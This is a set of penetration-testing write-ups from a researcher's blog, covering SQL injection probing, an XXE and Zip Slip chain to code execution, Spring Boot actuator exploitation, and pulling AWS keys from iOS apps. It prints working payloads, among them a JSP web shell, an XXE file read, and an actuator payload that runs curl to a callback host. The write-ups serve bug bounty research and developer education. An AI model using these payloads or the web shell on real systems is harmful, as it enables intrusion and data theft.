spaceraccoon.dev

Motivation

Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. Even ORM libraries have introduced SQL injections due to mistakes in translating object mappings to raw SQL statements. Of course, legacy applications and dangerous development practices also contribute to SQL injection vulnerabilities.

Initially, I faced difficulties identifying SQL injections. Unlike another common vulnerability class, Cross-Site Scripting (XSS), endpoints vulnerable to SQL injections usually don't provide feedback on where and how you're injecting into the SQL statement. For XSS, it's simple: with the exception of Blind XSS (where the XSS ends up in an admin panel or somewhere you don't have access to), you always see where your payload ends up in the HTML response.

For SQL injections, the best case scenario is that you get a verbose stack trace that tells you exactly what you need:

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=utf-8

<div id="error">
    <h1>Database Error</h1>
    <div class='message'>
        SQL syntax error near '''' where id=123' at line 1: update common_member SET name=''' where id=123
    </div>
</div>

If you see this, it's your lucky day. More often, however, you will either get a generic error message, or worse, no error at all – only an empty response.

HTTP/1.1 200 OK
Content-Type: application/json

{
    "users": []
}

As such, hunting SQL injections can be arduous and time-consuming. Many researchers prefer to do a single pass with automated tools like sqlmap and call it a day. However, running these tools without specific configurations is a blunt-instrument approach that is easily detected and blocked by Web Application Firewalls (WAFs). Furthermore, SQL injections occur in unique contexts: you might be injecting after a WHERE, a LIKE, or an ORDER BY, and each context requires a different kind of injection. This is even before various sanitization steps are applied.

Polyglots help researchers use a more targeted approach. However, polyglots, by their very definition, try to execute in multiple contexts at once, often sacrificing stealth and succinctness. Take for example the SQLi Polyglots from Seclists:

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/

Any half-decent WAF would pick up on these payloads and block them.

In real-world scenarios, researchers need to balance two concerns when searching for SQL injections:

  1. Ability to execute and thus identify injections in multiple contexts
  2. Ability to bypass WAFs and sanitization steps

A researcher can resolve this efficiently with something I call Isomorphic SQL Statements (although I'm sure other researchers have different names for it).

Incremental Approaches to Discovering Vulnerabilities

Going back to the XSS analogy, while XSS scanners and fuzzing lists are a dime a dozen, they usually don't work too well due to the WAF blocking and unique contexts mentioned above. Recently, more advanced approaches to automated vulnerability discovery have emerged that try to address the downsides of bruteforce scanning, like James Kettle's Backslash Powered Scanning. As Kettle writes,

Rather than scanning for vulnerabilities, we need to scan for interesting behaviour.

In turn, automation pipeline tools like Ameen Mali's qsfuzz and Project Discovery's nuclei test against defined heuristic rules (“interesting behaviour”) rather than blindly bruteforcing payloads. This is the path forward for large-scale vulnerability scanning as more organizations adopt WAFs and better development practices.

For example, when testing for an XSS, instead of asking “does an alert box pop when I put in this payload?”, I prefer to ask “does this application sanitize single quotes? How about angle brackets?” The plus side of this is that you can easily automate this on a large scale without triggering all but the most sensitive WAFs. You can then follow up with manual exploitation for each unique context.
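This quote-probing idea can be sketched as a tiny classifier (the probe marker and function name here are my own illustration, not from any scanner): send a unique marker wrapped in the characters you care about, then check whether those characters come back raw, entity-encoded, or stripped.

```python
import html

def classify_reflection(probe: str, response_body: str) -> str:
    """Classify how a probe was reflected in an HTML response:
    'raw' (potentially exploitable), 'encoded' (sanitized),
    or 'absent' (stripped or not reflected)."""
    if probe in response_body:
        return "raw"
    if html.escape(probe, quote=True) in response_body:
        return "encoded"
    return "absent"

# A unique marker wrapped in single quotes and angle brackets
probe = "zx9'\"<q>"
print(classify_reflection(probe, "<p>zx9&#x27;&quot;&lt;q&gt;</p>"))  # encoded
```

Running something like this against each parameter at scale surfaces the "interesting behaviour" without ever firing a full XSS payload at a WAF.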

The same goes for SQL injections. But how do you formulate your tests without any feedback mechanisms? Remember that SQL injections differ from XSS in that usually no (positive) response is given. Nevertheless, one thing I've learned from researchers like Ian Bouchard is that even no news is good news.

This is where Isomorphic SQL Statements come into play. Applied here, isomorphic simply means SQL statements that are written differently but should, in theory, return the same output. The twist is that the test statements include special characters like ' or -. If the characters are properly escaped, the injected SQL statement will fail to evaluate to the same result as the original. If they aren't properly escaped, you'll get the same result, which indicates an SQL injection is possible.

Let's illustrate this with a simple toy SQL injection:

CREATE TABLE Users (
    ID int key auto_increment,
    LastName varchar(255),
    FirstName varchar(255),
    Address varchar(255),
    City varchar(255)
);

INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Bird', 'Big', '123 Sesame Street', 'New York City'); 

INSERT INTO Users (LastName, FirstName, Address, City) VALUES ('Monster', 'Cookie', '123 Sesame Street', 'New York City'); 

SELECT FirstName FROM Users WHERE ID = <USER INPUT>;

If you are fuzzing with a large list of SQL polyglots, it would be relatively trivial to pick up the injection, but in reality the picture will be complicated by WAFs, sanitization, and more complex statements.

Next, consider the following statements:

SELECT FirstName FROM Users WHERE ID = 1;
SELECT FirstName FROM Users WHERE ID = 2-1;
SELECT FirstName FROM Users WHERE ID = 1+'';

They should all evaluate to the same result if the special characters in the last two statements are injected unsanitized. If they don't evaluate to the same results, the server is sanitizing them in some way.
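To make this concrete, here's a small helper (my own illustration, not part of any tool) that generates isomorphic variants of an observed numeric parameter; each variant should evaluate to the original value only if its special characters reach the query unsanitized:

```python
def numeric_isomorphs(value: int) -> list[str]:
    """Payloads that evaluate to `value` in SQL only if the
    injected characters survive sanitization."""
    return [
        str(value),        # baseline:              WHERE ID = 1
        f"{value + 1}-1",  # arithmetic:            WHERE ID = 2-1
        f"{value}+''",     # empty-string coercion: WHERE ID = 1+''
    ]

print(numeric_isomorphs(1))  # ['1', '2-1', "1+''"]
```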

DB Fiddle

Now consider a common version of a search query, SELECT Address FROM Users WHERE FirstName LIKE '%<USER INPUT>%' ORDER BY Address DESC;:

SELECT Address FROM Users WHERE FirstName LIKE '%Big%' ORDER BY Address DESC;
SELECT Address FROM Users WHERE FirstName LIKE '%Big%%%' ORDER BY Address DESC;
SELECT Address FROM Users WHERE FirstName LIKE '%Big%' '' ORDER BY Address DESC;

Simply by injecting the same special character % twice in the second statement, we get a clue about the actual SQL statement we are injecting into: if we receive the same response back, we are likely injecting after a LIKE operator.

Even better, as Arne Swinnen noted way back in 2013 (a pioneer!):

Strings: split a valid parameter’s string value in two parts, and add an SQL string concat directive in between. An identical response for both requests would again give you reason to believe you have just hit an SQL injection.

We can achieve the same isomorphic effect for strings as for numeric IDs simply by adding ' ' to our injection in the third statement. This is interpreted as concatenating the original string with a blank string, which should return the same response while indicating that ' isn't being properly escaped.

From here, it is a simple matter of experimenting incrementally. You thus achieve two objectives:

  1. Discover which injectable characters are entered unsanitized into the final SQL statement
  2. Discover the original SQL statement you are injecting into

Mass Automation and Caveats

The goal of this is not only to discover individual SQL injections, but to be able to automate and apply this across large numbers of URLs and inputs. Traditional SQL injection payload lists or scanners make large-scale scanning noisy and resource-intensive. With the incremental isomorphic approach, you apply a heuristic rule like:

if response(id_input) == response(id_input + "+''"):
    return True
else:
    return False

This is much lighter and faster. Of course, while you gain in terms of fewer false negatives (e.g. polyglots that work but are blocked by WAFs), you lose in terms of more false positives. For example, there are cases where the backend simply trims all non-numeric characters before entering an SQL statement, in which case the above isomorphic statement would still succeed. Thus, rather than relying on a single isomorphic statement (binary signal), you will want to watch for multiple isomorphic statements succeeding (spectrum signal).
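A minimal sketch of that spectrum signal (the fetch callable and the threshold are my own assumptions, not a real scanner) counts how many independent isomorphic variants match the baseline before flagging:

```python
from typing import Callable

def isomorphic_signal(fetch: Callable[[str], str], baseline: str,
                      variants: list[str], threshold: int = 2) -> bool:
    """Flag a parameter only when several isomorphic variants return
    the same response as the baseline, reducing false positives from
    e.g. backends that strip all non-numeric characters."""
    base_response = fetch(baseline)
    matches = sum(1 for v in variants if fetch(v) == base_response)
    return matches >= threshold

# Toy backend that performs no sanitization at all
responses = {"1": "Big", "2-1": "Big", "1+''": "Big"}
print(isomorphic_signal(responses.get, "1", ["2-1", "1+''"]))  # True
```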

Although SQL injections are getting rarer, I've still come across them occasionally in manual tests. A mass scanning approach will yield even better results.

XML and ZIP – A Tale as Old As Time

While researching a bug bounty target, I came across a web application that processed a custom file type. Let's call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.

This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:

Archive:  Document.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
  inflating: word/settings.xml       
  inflating: docProps/core.xml       
  inflating: word/fontTable.xml      
  inflating: word/webSettings.xml    
  inflating: word/styles.xml         
  inflating: docProps/app.xml        

Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.

However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.

Here's a quick overview of these “vulnerable features.”

XML External Entities

The XML file format supports external entities, which allow an XML file to pull data from other sources, such as local or remote files. In some cases this can be useful because it makes importing data from various sources more convenient. However, in cases where an XML parser accepts user-defined inputs, a malicious user can pull data from sensitive local files or internal network hosts.

As the OWASP Foundation wiki states:

This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser... Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use.

Just like in my previous Remote Code Execution writeup, developers are put at risk by vulnerable defaults.

ZIP Directory Traversal

Although ZIP directory traversal has been exploited since the format's inception, this attack vector gained prominence in 2018 due to Snyk's clumsily-named “Zip Slip” research/marketing campaign that found the vulnerability in many popular ZIP parser libraries.

An attacker can exploit this vulnerability with a ZIP file that contains directory traversal filenames such as ../../../../evil1/evil2/evil.sh. When a vulnerable ZIP library tries to unzip this file, rather than unzipping evil.sh to a temporary directory, it unzips it to another location in the filesystem defined by the attacker (in this case, /evil1/evil2). This can easily lead to remote code execution if an attacker overwrites a cron job script or creates a web shell in the web root directory.
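The defense is equally simple to sketch: resolve each member's destination path and reject anything that escapes the extraction directory. Here's a minimal illustration of that check in Python (my own sketch, ignoring symlinks and other edge cases, not a hardened implementation):

```python
import os

def is_safe_member(name: str, dest: str = "/tmp/extract") -> bool:
    """Reject archive member names whose resolved path would land
    outside the extraction directory (the core 'Zip Slip' defense)."""
    target = os.path.normpath(os.path.join(dest, name))
    return target.startswith(dest + os.sep)

print(is_safe_member("assets/logo.png"))                  # True
print(is_safe_member("../../../../evil1/evil2/evil.sh"))  # False
```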

Similar to XXEs, ZIP directory traversal is especially common in Java:

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand-crafted and shared among developer communities such as StackOverflow.

Discovering the XXE

Now that we have the theoretical foundations of the attack, let's move on to the actual vulnerability in practice. The application accepted uploads of the custom file type, unzipped them, parsed the XML manifest file, and returned a confirmation page with the manifest details. For example, if mypackage.xyz was a ZIP file containing the following manifest.xml:

<?xml version="1.0"?>
<packageinfo>
    <title>My Awesome Package</title>
    <author>John Doe</author>
    <documentation>https://google.com</documentation>
    <rating>4.2</rating>
</packageinfo>

I would get the following confirmation screen:

Package Info 1

The first thing I did was test for XSS. One tip about injecting XSS via XML is that XML doesn't support raw <htmltags> because this gets interpreted as an XML node, so you have to escape them in the XML like &lt;htmltags&gt;. Unfortunately, the output was sanitized properly.

The next move was to test for XXEs. Here, I made a mistake and began by testing for a remote external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM 'https://mycollab.burpcollaborator.net'>]>
<packageinfo>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>
    <documentation>https://google.com</documentation>
    <rating>4.2</rating>
</packageinfo>

I didn't get a pingback on my Burp Collaborator instance and immediately assumed XXEs were blocked. This was a mistake, because you should always test incrementally: start with basic internal entities, then local file entities, and only then remote ones. This helps you eliminate various possibilities along the way. After all, a standard firewall rule would block outgoing web connections, causing a remote external entity to fail. However, this does not necessarily mean local external entities are blocked.

Fortunately, I decided to try again later with a local external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM 'file:///etc/hosts'>]>
<packageinfo>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>
    <documentation>https://google.com</documentation>
    <rating>4.2</rating>
</packageinfo>

That's when I struck gold. The contents of /etc/hosts appeared in the confirmation page.

Package Info 2

Pivoting to RCE

Typically in a white hat hacking scenario, you stick to a non-destructive proof-of-concept and stop there. With the XXE, I could expose local database files and several interesting web logs that included admin credentials. This was sufficient to write up a report.

However, there was another vulnerability I wanted to test: the ZIP parser. Remember that the app unzipped the package, read the manifest.xml file, and returned a confirmation page. I found an XXE in the second step, suggesting that there might be additional vulnerabilities in the rest of the flow.

To test for ZIP directory traversal, I used evilarc, a simple Python 2 script to generate ZIP files with directory traversal payloads. I needed to figure out where I wanted to place my traversal payload in the local file system. Here, the XXE helped. Local external entities support not just files but also directories, so if I used an external entity like file:///nameofdirectory, instead of the contents of a file, it would list the contents of the directory.
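As an aside, evilarc targets Python 2, but crafting such an archive takes only a few lines of modern Python, because zipfile writes whatever entry name you give it (the payload path and contents below are illustrative):

```python
import io
import zipfile

# Build the malicious package entirely in memory
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    # A normal manifest so the application still parses the package
    zf.writestr("manifest.xml", "<?xml version='1.0'?><packageinfo/>")
    # zipfile does not sanitize entry names on write, so the
    # traversal sequence is stored verbatim
    zf.writestr("../../../../home/web/resources/templates/sitemap.jsp",
                "<%-- payload --%>")

with zipfile.ZipFile(io.BytesIO(buf.getvalue())) as zf:
    print(zf.namelist())
```

A vulnerable extractor that joins entry names to its output directory without normalizing them will write sitemap.jsp outside the unzip location.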

With a little digging through the directories, I eventually came across a file located at /home/web/resources/templates/sitemap.jsp. Its contents matched a page in the application – https://vulnapp.com/sitemap. I zipped the contents of the sitemap page along with a web shell as ../../../../../../home/web/resources/templates/sitemap.jsp in my package. I kept the web shell hidden via a secret URL parameter to prevent casual users from accidentally coming across it:

<%@ page import="java.util.*,java.io.*"%>
<%
    if (request.getParameter("spaceraccoon") != null) {
        out.println("Command: " + request.getParameter("spaceraccoon") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("spaceraccoon"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            out.println(disr); 
            disr = dis.readLine(); 
        }
        out.println("<BR>");
    }
%>
<ORIGINAL HTML CONTENTS OF SITEMAP>

I uploaded my package, browsed to https://vulnapp.com/sitemap?spaceraccoon=ls and... nothing. The page looked exactly the same.

A common saying goes:

The definition of insanity is doing the same thing over and over again and expecting a different result.

This does not apply to black box testing. Latency, caching, and other quirks of the web can return different outputs for the same input. In this case, the server had cached the original version of https://vulnapp.com/sitemap, which is why it initially returned the page without my web shell. After several refreshes, my web shell kicked in, and the page returned the contents of the web root directory along with the rest of the sitemap page contents. I was in.

Convention over Configuration

Configuration Meme

From the writeup, you might have noticed that I was dealing with a Java application. This brings us back to OWASP and Snyk's warnings that Java is uniquely prone to mishandling XML and ZIP files. Due to a combination of unsafe defaults and a lack of default parsers, developers are forced to rely on random Stack Overflow snippets or third-party libraries.

However, Java is not the only culprit. Mishandling of XML and ZIP files occurs across all programming languages and frameworks. Developers are expected to go out of their way to configure third-party libraries and APIs safely, and a single mistake is enough to introduce a vulnerability. The probability of this increases with every additional “black box” library.

One approach to reducing vulnerabilities in development is Spotify's “Golden Path”:

At Spotify, one of our engineering strategies is the creation and promotion of the use of “Golden Paths.” Golden Paths are a blessed way to build products at Spotify. They consist of a set of APIs, application frameworks, best practices, and runtime environments that allow Spotify engineers to develop and deploy code safely, securely, and at scale. We complement these with opt-in programs that help increase quality. From our bug bounty program reports, we’ve found that the more that development adheres to a Golden Path, the less likely there is to be a vulnerability reported to us.

This boils down to a simple Ruby on Rails maxim: “Convention over configuration.”

Rather than relying on thousands of engineers to individually remember all the quirks of web application security, it is a lot more efficient to focus on a battle-tested set of frameworks and APIs and reduce the need to constantly tweak these settings.

Fortunately, organizations can solve this in a systemic manner by adhering to convention over configuration.

Major thanks to the security team behind the bug bounty program, who fixed the vulnerability in less than 12 hours and gave the go-ahead to publish this writeup.

Prelude

The Spring Boot framework is one of the most popular Java-based microservice frameworks, helping developers quickly and easily deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process.

However, these development defaults can become dangerous in the hands of inexperienced developers. My write-up expands on the work of Michal Stepankin, who researched ways to exploit exposed actuators in Spring Boot 1.x and achieve RCE via deserialization. I provide an updated RCE method via Spring Boot 2.x's default HikariCP database connection pool and a common Java development database, the H2 Database Engine. I also created a sample Spring Boot application based on Spring Boot's default tutorial application to demonstrate the exploit.

Let's begin with the final payload:

POST /actuator/env HTTP/1.1

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream());  if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('curl  http://x.burpcollaborator.net');"}

The payload comprises three parts: the environment modification request to the /actuator/env endpoint, the CREATE ALIAS H2 SQL command, and of course the final OS command injection.

Act One: Exposed Actuators

Spring Boot Actuator creates several HTTP endpoints that allow a developer to easily monitor and manage an application. As Stepankin notes, “Starting with Spring version 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers.” For this exploit, the /actuator/env endpoint must be exposed. Developers only need to add management.endpoints.web.exposure.include=env (or worse, management.endpoints.web.exposure.include=*) to their application.properties configuration file to expose it.

The /actuator/env endpoint includes the GET and POST methods to retrieve and set the application's environment variables. The POST request uses the following format:

POST /actuator/env HTTP/1.1

{"name":"<NAME OF VARIABLE>","value":"<VALUE OF VARIABLE>"}

You can explore the list of environment variables for the application, which provide data about the execution context and system. However, only a few of these variables can be leveraged to change the app at runtime, and even fewer can be used to achieve code execution. Fortunately, Spring Boot 2.x uses the HikariCP database connection pool by default, which introduces one such variable.
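Assembling the request body itself is trivial; here's a sketch (the helper name is mine, and actually sending such a request should only be done against systems you are authorized to test):

```python
import json

def actuator_env_body(name: str, value: str) -> bytes:
    """Build the JSON body for a POST /actuator/env request."""
    return json.dumps({"name": name, "value": value}).encode()

body = actuator_env_body(
    "spring.datasource.hikari.connection-test-query",
    "SELECT 1;",
)
print(body.decode())
```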

Act Two: H2 CREATE ALIAS Command

HikariCP helps applications communicate with databases. According to its documentation, it accepts a connectionTestQuery configuration option, which defines “the query that will be executed just before a connection is given to you from the pool to validate that the connection to the database is still alive.” The matching Spring Boot environment variable is spring.datasource.hikari.connection-test-query. In short, whenever a new database connection is created, the value of spring.datasource.hikari.connection-test-query is executed as an SQL query first. There are two ways to trigger a new database connection: restart the application with a request to POST /actuator/restart, or change the size of the connection pool and force new connections to be initialized by making multiple requests to the application.

This is already pretty serious – you can run arbitrary SQL queries and drop the database if you want. However, let's escalate this further and look into the H2 Database Engine, one of the most popular Java development databases. Think of it as a Java-based SQLite, but extremely easy to integrate into Spring Boot. It only requires one dependency. As such, it's commonly used in Spring Boot development.

Matheus Bernardes highlighted an important SQL command included in H2: CREATE ALIAS. Similar to PostgreSQL's User-Defined Functions, you can define a Java function corresponding to the alias and subsequently call it in an SQL query like you would a function.

CREATE ALIAS GET_SYSTEM_PROPERTY FOR "java.lang.System.getProperty";
CALL GET_SYSTEM_PROPERTY('java.class.path');

Of course, you can use Java's Runtime.getRuntime().exec function, which allows you to execute OS commands directly.

Act Three: Command Injection against WAFs and Limited Execution Contexts

At this point, you might come up against common WAF filters, especially with juicy strings like exec(). However, one advantage of such a nested payload is that you can easily find bypasses using various string concatenation techniques. RIPSTech's Johannes Moritz demonstrates this by breaking up the query using the CONCAT and HEXTORAW commands:

CREATE ALIAS EXEC AS CONCAT('void e(String cmd) throws java.io.IOException',
HEXTORAW('007b'),'java.lang.Runtime rt= java.lang.Runtime.getRuntime();
rt.exec(cmd);',HEXTORAW('007d'));
CALL EXEC('whoami');

Another challenge is that you might be executing code in an extremely limited context. The application might be running in a Dockerized instance without internet access and with limited commands available; Alpine Linux, the most common Linux distribution in Docker, doesn't even ship with Bash. Additionally, the exec() function runs the OS command directly rather than through a shell, removing helpful tools like boolean comparisons, pipes, and redirections.

Here, it helps to zoom out a little and approach the payload in a holistic manner. Remember that the point of spring.datasource.hikari.connection-test-query is to validate whether the connection to the database is still alive. If the query fails, the application will believe that the database is not reachable and no longer return other database queries. An attacker can leverage this to get a blind RCE where instead of a command like curl x.burpcollaborator.net, they run grep root /etc/passwd. This returns output (since /etc/passwd does include the root string) and thus the query succeeds. The application continues to function normally. If they run grep nonexistent /etc/passwd, the command returns no output, the Java code throws an error, and the query fails, causing the app to fail.

String shellexec(String cmd) throws java.io.IOException {
 java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream());
 if (s.hasNext()) {
  return s.next();  // OS command returns output; return output and SQL query succeeds
 }
 throw new IllegalArgumentException(); // OS command fails to return output; throw exception and SQL query fails
}

This is an interesting way to tie together the three components of the payload to still prove code execution within a limited context. Many thanks to Ian Bouchard for pointing out the possibilities for a blind RCE.

Hopefully, you don't have to deal with that and can get a simple curl pingback instead, like my example vulnerable Spring Boot application.

Burp Collaborator

Conclusion: Dangerous Development Defaults

By exposing the /actuator/env and /actuator/restart endpoints – pretty common in a development setting – a developer puts their application at risk of remote code execution. Of course, this wouldn't be a problem if the application were only run locally, but it's not a stretch to imagine a careless developer putting it on a public IP during prototyping.

A common theme running through this write-up and the associated write-ups is that developers can easily introduce severe vulnerabilities in their code without knowing it. Actuators and the H2 database are useful tools to speed up development and prototyping, but exposing them creates a remote code execution vulnerability by default.

#springboot #pentest #cybersecurity #h2 #java

Motivation

Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it's also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.

Most iOS applications use third-party APIs and SDKs such as Twitter, Amazon Web Services, and so on. Interacting with these APIs requires API keys, which are used (and thus stored) in the app itself. A careless developer could easily leak keys with too many privileges or keys that were never meant to be stored on the client side in the first place.

What makes finding them an easy win? As described by top iOS developer Mattt Thompson:

There’s no way to secure secrets stored on the client. Once someone can run your software on their own device, it’s game over.

And maintaining a secure, closed communications channel between client and server incurs an immense amount of operational complexity — assuming it’s possible in the first place.

He also tells us that:

Another paper published in 2018 found SDK credential misuse in 68 out of a sample of 100 popular iOS apps. (Wen, Li, Zhang, & Gu, 2018)

Until APIs and developers come round to the fact that client secrets are insecure by design, there will always be these low-hanging vulnerabilities in iOS apps.

Techniques

Mattt Thompson shared three ways developers can (insecurely) store client secrets in their apps:

  1. Hard-code secrets in source code
  2. Store secrets in Info.plist
  3. Obfuscate secrets using code generation

For the first two methods, we can simply expose these secrets using static analysis and grepping through the decrypted app files as covered by Ivan Rodriguez. For obfuscated secrets, we can short-circuit the obfuscation and save ourselves hours of reverse-engineering through the magic of Frida's dynamic analysis. This was how I extracted AWS client and secret keys for a bug bounty program.

The following walkthrough assumes that you have set up your iOS testing environment according to my iOS app pentesting quickstart post.

Static Analysis

Static analysis begins with extracting your target .ipa file. Make sure that you have installed iproxy and frida-ios-dump.

  1. In one terminal, run iproxy 2222 22
  2. Open the target app on your iDevice
  3. In another terminal, run ./dump.py <APP DISPLAY NAME OR BUNDLE IDENTIFIER>
  4. You should now have a <APPNAME>.ipa file in your current directory
  5. mv <APPNAME>.ipa <APPNAME>.zip
  6. unzip <APPNAME>.zip
  7. The files are now unzipped to a Payload folder; open it up and check that an <APPNAME>.app file has been created (<APPNAME> might differ between the .ipa and .app files)
  8. mkdir AppFiles
  9. mv Payload/<APPNAME>.app/* AppFiles/

At this point, you should see a bunch of files in the AppFiles directory. While the files obviously differ from app to app, here are a few key files to look into.

Info.plist and other *.plist files: Info.plist functions similarly to manifest.json for Android apps. It contains app metadata and can point out weaknesses or new attack surfaces such as custom URL schemes. Of course, it can also contain stored credentials. You can use macOS' built-in plutil command to lay out the data nicely in JSON with plutil -p Info.plist.

Some plist files can be stored in binary rather than XML, which makes it harder to parse directly. Run plutil -convert xml1 Info.plist to convert them back to XML.

Quick tip: while GoogleService-Info.plist exists on many apps and includes an extremely juicy-looking API_KEY value, this is not a sensitive credential. It needs to be paired with a custom token to have any impact. Not all API keys are created equal; some have proper access controls and can be exposed without risk. Check out keyhacks to quickly identify and validate sensitive API keys.

You also want to begin grepping and parsing through the various files; grep "API_KEY" -r * or similar is a quick and dirty solution.
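A slightly smarter pass than raw grep is a small scanner with secret-shaped regexes (the patterns below are illustrative and far from exhaustive; pair anything it flags with keyhacks-style validation):

```python
import re
from pathlib import Path

# Illustrative patterns only; real scanners ship hundreds of these
PATTERNS = {
    "aws_access_key_id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic_api_key": re.compile(r"(?i)api_?key['\"\s:=]+[\w\-]{16,}"),
}

def scan_dir(root: str) -> list[tuple[str, str]]:
    """Return (file path, pattern name) pairs for files that
    contain secret-looking strings."""
    hits = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(errors="ignore")
        for name, pattern in PATTERNS.items():
            if pattern.search(text):
                hits.append((str(path), name))
    return hits
```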

At this point, you should also poke at interesting files that hint at vulnerable functionality: check HTML files (maybe an internal URL scheme vulnerable to DOM XSS?), templates, and third-party frameworks that could have known vulnerabilities.

With luck, you might walk away with a straightforward credential exposure.

Dynamic Analysis

Most of the time, it won't be that straightforward. Nevertheless, there are clues that might point you towards obfuscated credentials.

In one bug bounty program, I noticed that the app I was testing uploaded profile pictures to an S3 bucket, but the request was hidden from interception and the credentials were not stored in plaintext in the app files. Nevertheless, given that the upload was occurring, it was a safe bet to assume that credentials were being exchanged.

At this point, I could dive into the binary with Ghidra and attempt to walk through the obfuscated code to decrypt the credentials, but there is a way to short-circuit this whole process.

Think of it this way: at the end of the day, no matter how much obfuscation is used, the credentials need to be sent in plaintext (for insecure implementations) to the server. For that to happen, a method needs to be invoked somewhere in the code using these credentials.

This is where Frida and Objection come in. You want to hook onto the method that makes that call, and dump the arguments to that method – which should hopefully be the credentials you are looking for.
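Conceptually, this is just function wrapping. Here's a toy Python analogy (not Frida itself) of "watching" a method and dumping its arguments; the class and method names are stand-ins for the Objective-C ones below:

```python
import functools

def watch(method):
    """Wrap a method so every call logs its arguments before running --
    the same idea Frida applies to Objective-C methods at runtime."""
    @functools.wraps(method)
    def wrapper(self, *args, **kwargs):
        print(f"Called: {method.__name__} args={args}")
        return method(self, *args, **kwargs)
    return wrapper

class Uploader:
    def init_key(self, key):  # stands in for something like -[AWSCredentials initKey:]
        self._key = key

Uploader.init_key = watch(Uploader.init_key)  # "hook" the method
Uploader().init_key("client:secret")          # the wrapper prints the credential
```

No matter how obfuscated the code that computes the credential is, the hooked method sees it in plaintext.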

First, you need to identify the method. Fire up Objection with objection --gadget <APPNAME> explore. Next, run ios hooking list classes to dump all available classes in the app. This is a huge list. Grep through the list and identify interesting classes. For example, I looked for the classes with AWS or Amazon in the name. As luck would have it, there was an AWSCredentials class, among other interesting class names.

Objection console

Next, you want to begin watching these classes. Run ios hooking watch class <CLASSNAME> in the Objection console for each class. Now, perform the action in the app where the potentially vulnerable credentials could be exposed. In this case, I performed the profile picture upload function in the app, which triggered the following response:

(agent) Watching method: - initKey:
(agent) Watching method: - initSDK:
(agent) Registering job gk6i5disc88. Type: watch-class-methods for: AWSCredentials
myApp on (iPhone: 13.1.2) [usb] # (agent) [gk6i5disc88] Called: [AWSS3Client initKey:] (Kind: instance) (Super: AWSClient)

Awesome. So it looks like Frida successfully hooked onto the AWSCredentials class which includes the initKey and initSDK methods. When I performed the profile picture upload, the initKey method was called.

Now, we want to dump the arguments passed into the initKey instance method. In Objection, run ios hooking watch method "-[AWSCredentials initKey:]" --dump-args. Note that the format for an instance method is "-[<CLASSNAME> <METHOD>:]". Once again, I performed the profile picture upload in the app.

(agent) [gk6i5disc88] Called: -[AWSCredentials initKey:] 1 argument(Kind: instance) (Super: NSObject)
(agent) [gk6i5disc88] Argument dump: [AWSCredentials initKey: <AWS CLIENT KEY>:<AWS SECRET KEY>]

Success! Using dynamic analysis, I exposed the AWS keys used by the application. Of course, this meant the app was shipping long-lived AWS credentials even though there are credential-less ways of implementing S3 uploads, such as server-generated presigned URLs.

Conclusion

Hunting for secrets in iOS apps is a low-effort, high-payoff task that can help ease you into pentesting an application. (Un)fortunately, secrets management remains a hard problem especially for less-experienced developers, and continues to crop up as a recurring vulnerability. It's easy to forget that credentials are still exposed even when compiled into an app binary.

#ios #pentest #cybersecurity #frida #aws

Motivation

I wanted to get into mobile app pentesting. While it's relatively easy to get started on Android, it's harder to do so with iOS. For example, while Android has the Android Virtual Device and a host of other third-party emulators, iOS only has Xcode's iOS Simulator, which mimics the software environment of an iPhone, not the hardware. As such, iOS app pentesting requires an actual iOS device.

